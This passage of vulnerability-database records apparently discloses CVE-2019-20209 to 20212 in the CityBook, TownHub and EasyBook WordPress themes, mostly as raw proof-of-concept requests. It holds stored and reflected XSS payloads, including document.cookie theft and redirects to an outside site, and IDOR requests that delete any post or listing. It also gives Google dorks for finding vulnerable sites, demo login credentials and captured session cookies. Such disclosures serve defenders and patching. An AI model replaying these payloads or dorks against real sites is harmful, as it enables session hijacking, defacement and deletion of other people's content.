name=\"lid\"\r\n\r\n7610\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"listing_type_id\"\r\n\r\n4901\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"isSubmit\"\r\n\r\ntrue\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"hasError\"\r\n\r\nfalse\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"title\"\r\n\r\nPoC\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"content\"\r\n\r\n<p><h1 style=\"font-size:68px;background:black;color:red;\">Greetings from m0ze</h1></p>\r\n\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"thumbnail[0]\"\r\n\r\n\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"cats[0]\"\r\n\r\n50\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"tags\"\r\n\r\n\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"locations\"\r\n\r\nUS|\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"features[0]\"\r\n\r\n64\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"features[1]\"\r\n\r\n84\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"features[2]\"\r\n\r\n66\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"features[3]\"\r\n\r\n76\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"working_hours[timezone]\"\r\n\r\nAmerica/New_York\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"working_hours[Monday][static]\"\r\n\r\nenterHours\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"working_hours[Tuesday][static]\"\r\n\r\nenterHours\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"working_hours[Wednesday][static]\"\r\n\r\nenterHours\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"working_hours[Thursday][static]\"\r\n\r\nenterHours\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"working_hours[Friday][static]\"\r\n\r\nenterHours\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"working_hours[Saturday][static]\"\r\n\r\nenterHours\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"working_hours[Sunday][static]\"\r\n\r\nenterHours\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"ltags_names\"\r\n\r\nm0ze\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"post_excerpt\"\r\n\r\n\"><h1>Greetings from m0ze</h1>\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"contact_infos_address\"\r\n\r\n<!--<img src=\"--><img src=x onerror=(alert)(`m0zeAddr`)//\">\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"contact_infos_latitude\"\r\n\r\n<!--<img src=\"--><img src=x onerror=(alert)(`m0zeLat`)//\">\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"contact_infos_longitude\"\r\n\r\n<!--<img src=\"--><img src=x onerror=(alert)(`m0zeLng`)//\">\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"gmap\"\r\n\r\n\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"contact_infos_email\"\r\n\r\n<!--<img src=\"--><img src=x onerror=(alert)(`m0ze`)//\">\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"contact_infos_phone\"\r\n\r\n\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"contact_infos_website\"\r\n\r\n\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"price_range\"\r\n\r\nmoderate\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"price_from\"\r\n\r\n-\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"price_to\"\r\n\r\n-\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"listing_dates\"\r\n\r\n\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"listing_dates_show_metas\"\r\n\r\n\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"lservices[0][service_id]\"\r\n\r\n--imgsrc---imgsrcxonerroralertm0ze88-\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"lservices[0][service_name]\"\r\n\r\n<!--<img src=\"--><img src=x onerror=(alert)(`ServiceName`)//\">\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"lservices[0][service_desc]\"\r\n\r\n\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"lservices[0][service_price]\"\r\n\r\n-\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"lmember[0][name]\"\r\n\r\n<!--<img src=\"--><img src=x onerror=(alert)(`Membername`)//\">\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"lmember[0][job]\"\r\n\r\n<!--<img src=\"--><img src=x onerror=(alert)(`MemberJob`)//\">\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"lmember[0][desc]\"\r\n\r\n<!--<img src=\"--><img src=x onerror=(alert)(`MemberDesc`)//\">\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nsubmit_listing\r\n-----------------------------18467633426500\r\nContent-Disposition: form-data; name=\"_wpnonce\"\r\n\r\n82b818f99a\r\n-----------------------------18467633426500--\r\n\r\n\r\n----[]- IDOR #0: -[]----\r\nDelete any post/page/listing:\r\n\r\nPOST /wp-admin/admin-ajax.php HTTP/1.1\r\nHost: citybook2.cththemes.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 84\r\nOrigin: https://citybook2.cththemes.com\r\nDNT: 1\r\nConnection: close\r\nReferer: https://citybook2.cththemes.com/dashboard/?dashboard=listings\r\nCookie: wordpress_sec_54d435e7d6922c566192cbf944196731=m0ze%7C1577577435%7CCetjW0nljmUkpvT20iPGzGootvMteHZr11imzXOb9e1%7C5958646454ea6fce0436f799b43314427bbf1336415aedc7eccfc1327da8c45f; tk_ai=woo%3AQQKdIMycj4rMbRJC%2BiDJmr%2FX; wordpress_logged_in_54d435e7d6922c566192cbf944196731=m0ze%7C1577577435%7CCetjW0nljmUkpvT20iPGzGootvMteHZr11imzXOb9e1%7C073f75d0412d7acbadd7fbc55d1524cf46e4625206c12b0832694ad3bb96689d; wp-settings-785=libraryContent%3Dbrowse%26editor%3Dhtml; wp-settings-time-785=1577404779\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\nlid=1770&action=citybook_addons_delete_listing&_nonce=ffb1991cee&_wpnonce=ffb1991cee\r\n\r\nWhere:\r\nlid=XXXX (page/post/listing unique WordPress ID, can be discovered as a page class for <body> tag).\r\n\r\n\r\n----[]- IDOR #1: -[]----\r\nRemove the \u00abFeatured\u00bb option for any listing:\r\n\r\nPOST /wp-admin/admin-ajax.php HTTP/1.1\r\nHost: citybook2.cththemes.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 101\r\nOrigin: https://citybook2.cththemes.com\r\nDNT: 1\r\nConnection: close\r\nReferer: https://citybook2.cththemes.com/dashboard/?dashboard=listings\r\nCookie: wordpress_sec_54d435e7d6922c566192cbf944196731=m0ze%7C1577577435%7CCetjW0nljmUkpvT20iPGzGootvMteHZr11imzXOb9e1%7C5958646454ea6fce0436f799b43314427bbf1336415aedc7eccfc1327da8c45f; tk_ai=woo%3AQQKdIMycj4rMbRJC%2BiDJmr%2FX; wordpress_logged_in_54d435e7d6922c566192cbf944196731=m0ze%7C1577577435%7CCetjW0nljmUkpvT20iPGzGootvMteHZr11imzXOb9e1%7C073f75d0412d7acbadd7fbc55d1524cf46e4625206c12b0832694ad3bb96689d; wp-settings-785=libraryContent%3Dbrowse%26editor%3Dhtml; wp-settings-time-785=1577404779\r\n\r\nlid=1739&lfeatured=true&action=citybook_addons_featured_listing&_nonce=ffb1991cee&_wpnonce=ffb1991cee\r\n\r\nWhere:\r\nlid=XXXX (page/post/listing unique WordPress ID, can be discovered as a page class for <body> tag).", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-12-09T22:04:08", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-20209", "CVE-2019-20210", "CVE-2019-20211", "CVE-2019-20212"], "description": "Multiple vulnerabilities was discovered in the \u00abTownHub - Directory & Listing WordPress Theme\u00bb, tested version \u2014 v1.0.2: \\- Unauthenticated XSS \\- Authenticated Persistent XSS \\- IDOR Edit (WPScanTeam): December 27h, 2019 - Envato Contacted January 5th, 2020 - Envato Investigating January 6th, 2020 - v1.0.6 released\n", "modified": "2020-09-22T07:40:47", "published": "2020-01-09T00:00:00", "id": "WPEX-ID:10014", "href": "", "type": "wpexploit", "title": "TownHub < 1.0.6 - Multiple Vulnerabilities", "sourceData": "----[]- Info: -[]----\r\nDemo website: https://townhub.cththemes.com/\r\nDemo account: m0ze2/asdasd (login/password)\r\nPoC listing: https://townhub.cththemes.com/dashboard/?dashboard=listings\r\nGoogle Dork: /wp-content/themes/townhub/\r\nDate: 27/12/2019\r\n\r\n\r\n----[]- Reflected XSS: -[]----\r\nInput field with placeholder \u00abWhat are you looking for?\u00bb on the homepage is vulnerable. Same thing with a regular search (block near website logo).\r\n\r\nPayload Sample #0: <img src=x onerror=alert(document.cookie)>\r\nPayload Sample #1: <img src=x onerror=window.location=`https://m0ze.ru`;>\r\n\r\nPoC #0: https://townhub.cththemes.com/?search_term=%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=\r\n\r\nPoC #1: https://townhub.cththemes.com/?search_term=%3Cimg+src%3Dx+onerror%3Dwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=\r\n\r\n\r\n----[]- Persistent XSS -> Chat: -[]----\r\nPossibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website (from https://townhub.cththemes.com/dashboard/?dashboard=chats or from chat widget on the bottom right corner).\r\n\r\nPayload Sample #0: <img src=x onerror=alert(`m0ze`)>\r\nPayload Sample #1: <img src=x onerror=window.location=`https://m0ze.ru`;>\r\n\r\n\r\n----[]- Persistent XSS -> Listing page: -[]----\r\nAdd new listing here https://townhub.cththemes.com/submit-listing/#/ (first time you need to order a \u00abFree\u00bb plan and go to this URL again).\r\nVulnerable input fields: \u00abAddress\u00bb, \u00abLatitude (Drag marker on the map)\u00bb, \u00abLongitude (Drag marker on the map)\u00bb, \u00abEmail Address\u00bb, \u00abPhone Number\u00bb and \u00abWebsite\u00bb. Payload inside \u00abAddress\u00bb, \u00abLatitude (Drag marker on the map)\u00bb and \u00abLongitude (Drag marker on the map)\u00bb input fields also works on the admin dashboard, so it's possible to steal administrator cookies.\r\n\r\nPayload Sample #0: \"><img src=x onerror=alert(document.cookie)>\r\nPayload Sample #1: \"><h1>Greetings from m0ze</h1>\r\nPayload Sample #2: \"><script>alert(`PoC`);</script>\r\n\r\n\r\n----[]- IDOR: -[]----\r\nDelete any post/page/listing:\r\n\r\nPOST /wp-admin/admin-ajax.php HTTP/1.1\r\nHost: townhub.cththemes.com\r\nUser-Agent: Mozilla/5.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 83\r\nOrigin: https://townhub.cththemes.com\r\nDNT: 1\r\nConnection: close\r\nReferer: https://townhub.cththemes.com/dashboard/?dashboard=listings\r\nCookie: _your_cookies_here_\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\nlid=XXXX&action=townhub_addons_delete_listing&_nonce=3fb56225d8&_wpnonce=3fb56225d8\r\n\r\nWhere:\r\nlid=XXXX (page/post/listing unique WordPress ID, can be discovered as a page class for <body> tag).", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "wpvulndb": [{"lastseen": "2020-12-09T21:00:14", "bulletinFamily": "software", "cvelist": ["CVE-2019-20209", "CVE-2019-20210", "CVE-2019-20211", "CVE-2019-20212"], "description": "Multiple vulnerabilities was discovered in the \u00abEasyBook \u2013 Directory & Listing WordPress Theme\u00bb, tested version \u2014 v1.2.1: \\- Unauthenticated Reflected XSS \\- Authenticated Persistent XSS \\- IDOR December 27th, 2019 - Envato Contacted January 6th, 2020 - Envato Investigating January ??th, 2020 - Theme has been removed from Envato January 8th, 2020 - v1.2.2 released January 10th, 2020 - Theme put back on Envato\n\n### PoC\n\n\\----[]- Info: -[]---- Demo website: https://www.easybook.cththemes.org/ Demo account: m0ze2/asdasd (login/password) PoC listing: https://www.easybook.cththemes.org/dashboard/#/listingsPending Google Dork: /wp-content/themes/easybook/ Date: 27/12/2019 \\----[]- Reflected XSS: -[]---- Input field with placeholder \u00abHotel , City...\u00bb on the homepage is vulnerable. Same thing with a regular search (block under the \u00abAdd Listing\u00bb button). Payload Sample #0:  Payload Sample #1:  PoC #0: https://www.easybook.cththemes.org/?search_term=%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&amp;checkin;=&amp;checkout;=&amp;adults;=1&amp;children;=0 PoC #1: https://www.easybook.cththemes.org/?search_term=%3Cimg+src%3Dx+onerror%3Dwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&amp;checkin;=&amp;checkout;=&amp;adults;=1&amp;children;=0 \\----[]- Persistent XSS -> Chat: -[]---- Possibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website (from https://www.easybook.cththemes.org/dashboard/#/chats or from chat widget on the bottom right corner). Payload Sample #0:  Payload Sample #1:  PoC: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: www.easybook.cththemes.org User-Agent: Mozilla/5.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 144 Origin: https://www.easybook.cththemes.org DNT: 1 Connection: close Referer: https://www.easybook.cththemes.org/dashboard/ Cookie: _your_cookies_here_ action=easybook_addons_chat_reply&_nonce=1c8cd14288&amp;cid;=600&amp;user;_id=XXX&amp;touid;=1&amp;reply;_text=_payload_ Where: user_id=XXX (your unique WordPress ID); touid=1 (message receiver ID, in this example ID 1 == account \u00abadmin\u00bb); reply_text=_payload_ (your payload). \\----[]- Persistent XSS -> Listing page: -[]---- Add new listing here https://www.easybook.cththemes.org/dashboard/#/addListing (first time you need to order a \u00abFree\u00bb plan and go to this URL again). Vulnerable input fields: \u00abAddress\u00bb, \u00abLongitude\u00bb, \u00abLatitude\u00bb, \u00abFact Title\u00bb and \u00abFact Number\u00bb. Payload Sample #0: \"> Payload Sample #1: \">\n\n# Greetings from m0ze\n\nPayload Sample #2: \"> PoC: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: www.easybook.cththemes.org User-Agent: Mozilla/5.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------970149683563 Content-Length: 4142 Origin: https://www.easybook.cththemes.org DNT: 1 Connection: close Referer: https://www.easybook.cththemes.org/dashboard/ Cookie: _your_cookies_here_ \\-----------------------------970149683563 Content-Disposition: form-data; name=\"lid\" 0 \\-----------------------------970149683563 Content-Disposition: form-data; name=\"listing_type_id\" 5058 \\-----------------------------970149683563 Content-Disposition: form-data; name=\"isSubmit\" true \\-----------------------------970149683563 Content-Disposition: form-data; name=\"working_hours[timezone]\" America/New_York \\-----------------------------970149683563 Content-Disposition: form-data; name=\"working_hours[Monday][static]\" enterHours \\-----------------------------970149683563 Content-Disposition: form-data; name=\"working_hours[Tuesday][static]\" enterHours \\-----------------------------970149683563 Content-Disposition: form-data; name=\"working_hours[Wednesday][static]\" enterHours \\-----------------------------970149683563 Content-Disposition: form-data; name=\"working_hours[Thursday][static]\" enterHours \\-----------------------------970149683563 Content-Disposition: form-data; name=\"working_hours[Friday][static]\" enterHours \\-----------------------------970149683563 Content-Disposition: form-data; name=\"working_hours[Saturday][static]\" enterHours \\-----------------------------970149683563 Content-Disposition: form-data; name=\"working_hours[Sunday][static]\" enterHours \\-----------------------------970149683563 Content-Disposition: form-data; name=\"locations\" US|M \\-----------------------------970149683563 Content-Disposition: form-data; name=\"title\" PoC \\-----------------------------970149683563 Content-Disposition: form-data; name=\"address\" \"> \\-----------------------------970149683563 Content-Disposition: form-data; name=\"longitude\" \"> \\-----------------------------970149683563 Content-Disposition: form-data; name=\"latitude\" \"> \\-----------------------------970149683563 Content-Disposition: form-data; name=\"author_email\" M \\-----------------------------970149683563 Content-Disposition: form-data; name=\"author_phone\" M \\-----------------------------970149683563 Content-Disposition: form-data; name=\"author_website\" M \\-----------------------------970149683563 Content-Disposition: form-data; name=\"content\" \"> \\-----------------------------970149683563 Content-Disposition: form-data; name=\"features[0]\" 303 \\-----------------------------970149683563 Content-Disposition: form-data; name=\"features[1]\" 300 \\-----------------------------970149683563 Content-Disposition: form-data; name=\"features[2]\" 305 \\-----------------------------970149683563 Content-Disposition: form-data; name=\"features[3]\" 302 \\-----------------------------970149683563 Content-Disposition: form-data; name=\"facts[0][title]\" \"> \\-----------------------------970149683563 Content-Disposition: form-data; name=\"facts[0][number]\" \"> \\-----------------------------970149683563 Content-Disposition: form-data; name=\"facts[0][icon]\" 123 \\-----------------------------970149683563 Content-Disposition: form-data; name=\"lservices[0][service_id]\" -imgsrcxonerroralert12 \\-----------------------------970149683563 Content-Disposition: form-data; name=\"lservices[0][service_name]\" M \\-----------------------------970149683563 Content-Disposition: form-data; name=\"lservices[0][service_desc]\" M \\-----------------------------970149683563 Content-Disposition: form-data; name=\"lservices[0][service_price]\" 0 \\-----------------------------970149683563 Content-Disposition: form-data; name=\"action\" submit_listing \\-----------------------------970149683563 Content-Disposition: form-data; name=\"_wpnonce\" 1c8cd14288 \\-----------------------------970149683563-- \\----[]- IDOR: -[]---- Delete any post/page/listing: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: www.easybook.cththemes.org User-Agent: Mozilla/5.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 64 Origin: https://www.easybook.cththemes.org DNT: 1 Connection: close Referer: https://www.easybook.cththemes.org/dashboard/ Cookie: _your_cookies_here_ action=easybook_addons_delete_listing&_nonce=1c8cd14288&amp;lid;=XXXX Where: lid=XXXX (page/post/listing unique WordPress ID, can be discovered as a page class for tag).\n", "modified": "2020-09-22T08:25:27", "published": "2020-01-10T00:00:00", "id": "WPVDB-ID:10018", "href": "https://wpvulndb.com/vulnerabilities/10018", "type": "wpvulndb", "title": "EasyBook < 1.2.2 - Multiple Vulnerabilities", "sourceData": "", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-12-09T22:38:42", "bulletinFamily": "software", "cvelist": ["CVE-2019-20210", "CVE-2019-20211", "CVE-2019-20212", "CVE-2019-20209"], "description": "Multiple vulnerabilities was discovered in the \u00abCityBook - Directory & Listing WordPress Theme\u00bb, tested version \u2014 v2.3.3: \\- Unauthenticated Reflected XSS \\- Authenticated Persistent XSS \\- IDOR Edit (WPScanTeam): December 27h, 2019 - Envato Contacted January 6th, 2020 - Envato Investigating January 7th, 2020 - v2.3.4 released\n\n### PoC\n\n\\----[]- Info: -[]---- Google Dork: /wp-content/themes/citybook/ Date: 27/12/2019 Demo website: https://citybook2.cththemes.com/ Demo account: m0ze2/asdasd (login/password) PoC listing: https://citybook2.cththemes.com/dashboard/?dashboard=listings \\----[]- Reflected XSS: -[]---- Input field with placeholder \u00abWhat are you looking for?\u00bb on the homepage is vulnerable. Any payload will be triggered three times if you use \"> in front of it. Same thing with a regular search (block near website logo). Payload Sample #0: \"> Payload Sample #1:  Payload Sample #2:  PoC #0: https://citybook2.cththemes.com/?search_term=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E#038;location_search&amp;nearby=off&amp;address_lat&amp;address_lng&amp;distance=10&amp;lcats%5B%5D= PoC #1: https://citybook2.cththemes.com/?search_term=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&amp;location;_search=&amp;nearby;=off&amp;address;_lat=&amp;address;_lng=&amp;distance;=10&amp;lcats;%5B%5D= PoC #2: https://citybook2.cththemes.com/?search_term=%22%3E%3Cimg+src%3Dx+onerror%3Dwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&amp;location;_search=&amp;nearby;=off&amp;address;_lat=&amp;address;_lng=&amp;distance;=10&amp;lcats;%5B%5D= \\----[]- Persistent XSS -> Chat: -[]---- Possibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website (from https://citybook2.cththemes.com/dashboard/?dashboard=chats or from chat widget on the bottom right corner). Payload Sample #0:  Payload Sample #1:  PoC: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: citybook2.cththemes.com User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 172 Origin: https://citybook2.cththemes.com DNT: 1 Connection: close Referer: https://citybook2.cththemes.com/dashboard/?dashboard=chats Cookie: wordpress_sec_54d435e7d6922c566192cbf944196731=m0ze%7C1577594557%7C8iIk54JQ5kAHa6T7JSiVvfOBTdqUbwjbQ4N5dlpeobY%7C405cfe7009dfb008514e88229282ad33155a10e3d6d1c666e2cee90970212542; tk_ai=woo%3AQQKdIMycj4rMbRJC%2BiDJmr%2FX; wordpress_logged_in_54d435e7d6922c566192cbf944196731=m0ze%7C1577594557%7C8iIk54JQ5kAHa6T7JSiVvfOBTdqUbwjbQ4N5dlpeobY%7Cbc01a1bfc8e119a186128f522382374eae5a7d80a044290cfd77280880c51de0 action=citybook_addons_chat_reply&_nonce=a75ac6298d&amp;cid;=1230&amp;user;_id=785&amp;touid;=1&amp;reply;_text=%3Cimg%20src%3Dx%20onerror%3Dwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E Where: user_id=XXX (your ID; in this example account \u00abm0ze\u00bb have ID 785); touid=1 (message receiver ID, in this example ID 1 == account \u00abadmin\u00bb); reply_text=_payload_ (your payload text). \\----[]- Persistent Self-XSS -> Profile: -[]---- Vulnerable input fields: \u00abPhone\u00bb and \u00abAddress\u00bb (will be triggered only on https://citybook2.cththemes.com/dashboard/?dashboard=profile page for current user). Payload Sample #0: \"> Payload Sample #1: \">\n\n# Greetings from m0ze\n\nPayload Sample #2: \"> \\----[]- Persistent XSS -> Listing page: -[]---- Add new listing here https://citybook2.cththemes.com/submit/ (first time you need to order a \u00abFree\u00bb plan and go to this URL again). Vulnerable input fields: \u00abListing Address\u00bb, \u00abListing Latitude\u00bb, \u00abListing Longitude\u00bb, \u00abEmail Address\u00bb, \u00abDescription\u00bb. \u00abTrainers\u00bb section: \u00abAdd Member\u00bb option with \u00abName\u00bb, \u00abJob or Position\u00bb and \u00abDescription\u00bb vulnerable input fields. \u00abAdditional Services Fees\u00bb section: \u00abAdd Service\u00bb option with \u00abService Name\u00bb vulnerable input field. \u00abListing Address\u00bb payload also works on the admin dashboard, so it's possible to steal administrator cookies. Payload Sample #0: \"> Payload Sample #1: \">\n\n# Greetings from m0ze\n\nPayload Sample #2: \"> PoC: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: citybook2.cththemes.com User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------18467633426500 Content-Length: 5848 Origin: https://citybook2.cththemes.com DNT: 1 Connection: close Referer: https://citybook2.cththemes.com/edit-listing/?listing_id=7610 Cookie: wordpress_sec_54d435e7d6922c566192cbf944196731=m0ze2%7C1577601272%7CzdPIIYkbIF1EvBpygfJo6Sp9MO5rD5h2FRb0kSFOkb5%7C62973039250bcf64067f2d87460bc142bfc1a6623ea7c5a57cc973245fff0a97; tk_ai=woo%3AQQKdIMycj4rMbRJC%2BiDJmr%2FX; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_54d435e7d6922c566192cbf944196731=m0ze2%7C1577601272%7CzdPIIYkbIF1EvBpygfJo6Sp9MO5rD5h2FRb0kSFOkb5%7C1790d7d33689fe6e21ffc2bcd001af3aa10e523b5a701b6f02944a4dd965f170; wp-settings-788=editor%3Dhtml; wp-settings-time-788=1577428516 \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"lid\" 7610 \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"listing_type_id\" 4901 \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"isSubmit\" true \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"hasError\" false \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"title\" PoC \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"content\" \n\n# Greetings from m0ze\n\n\\-----------------------------18467633426500 Content-Disposition: form-data; name=\"thumbnail[0]\" \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"cats[0]\" 50 \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"tags\" \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"locations\" US| \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"features[0]\" 64 \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"features[1]\" 84 \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"features[2]\" 66 \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"features[3]\" 76 \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"working_hours[timezone]\" America/New_York \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"working_hours[Monday][static]\" enterHours \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"working_hours[Tuesday][static]\" enterHours \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"working_hours[Wednesday][static]\" enterHours \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"working_hours[Thursday][static]\" enterHours \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"working_hours[Friday][static]\" enterHours \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"working_hours[Saturday][static]\" enterHours \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"working_hours[Sunday][static]\" enterHours \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"ltags_names\" m0ze \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"post_excerpt\" \">\n\n# Greetings from m0ze\n\n\\-----------------------------18467633426500 Content-Disposition: form-data; name=\"contact_infos_address\"  \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"contact_infos_latitude\"  \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"contact_infos_longitude\"  \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"gmap\" \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"contact_infos_email\"  \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"contact_infos_phone\" \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"contact_infos_website\" \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"price_range\" moderate \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"price_from\" \\- \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"price_to\" \\- \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"listing_dates\" \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"listing_dates_show_metas\" \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"lservices[0][service_id]\" \\--imgsrc---imgsrcxonerroralertm0ze88- \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"lservices[0][service_name]\"  \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"lservices[0][service_desc]\" \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"lservices[0][service_price]\" \\- \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"lmember[0][name]\"  \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"lmember[0][job]\"  \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"lmember[0][desc]\"  \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"action\" submit_listing \\-----------------------------18467633426500 Content-Disposition: form-data; name=\"_wpnonce\" 82b818f99a \\-----------------------------18467633426500-- \\----[]- IDOR #0: -[]---- Delete any post/page/listing: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: citybook2.cththemes.com User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 